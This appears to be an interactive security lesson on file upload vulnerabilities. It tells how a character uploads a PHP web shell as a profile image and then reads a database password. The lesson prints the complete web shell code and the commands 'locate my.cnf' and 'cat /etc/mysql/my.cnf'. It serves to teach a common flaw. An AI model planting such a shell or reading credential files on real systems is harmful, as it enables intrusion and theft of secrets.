File Upload Vulnerabilities
Exit
Mal is a hacker that has signed up for a website running on a popular content management system.
He has noticed a couple of things about the site's profile image upload function.
Firstly, uploaded files do not get renamed as part of the upload process. The file name appears in the URL of the profile image when it is published.
Secondly, file-type checking is done in JavaScript.
Mal writes a simple script called hack.php. When this web shell is executed by PHP, it will run any command passed in the "cmd" parameter.
He disables JavaScript in his browser, and uploads hack.php as his profile image. Since JavaScript is disabled, the file type is not checked.
Unsurprisingly, his profile looks broken - the file he uploaded is not a valid image. However, the script now lives on the server.
Dropping the URL of the "profile image" in the browser address bar causes the script to be executed.
In fact, any command passed in the "cmd" parameter will get executed on the server. His upload has created a command execution vulnerability.
Help Mal get access to sensitive data on the server. Pass in the locate my.cnf command to find a database config file.
Good job! Now invoke the cat /etc/mysql/my.cnf command to read the file and discover the database password.
What fun I will have in my basement today!
I feel a hack approaching.
Oooh, it's getting real close.
EAT MY HACK, mwah ha ha.
I AM GREATLY PLEASED.
There it is! Thank you kindly.
YOUR PROFILE
UPLOADING...
  USERNAME
Mal
YOUR PROFILE
UPLOADING...
  USERNAME
Mal
<?php
  if(isset($_REQUEST['cmd'])) {
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
  } else {
    echo "What is your bidding?";
  }
?>
A simple web shell, which when executed by PHP, will run any command passed in the "cmd" parameter.
YOUR PROFILE
UPLOADING...
  USERNAME
Mal
YOUR PROFILE
UPLOADING...
  USERNAME
Mal
What is your bidding?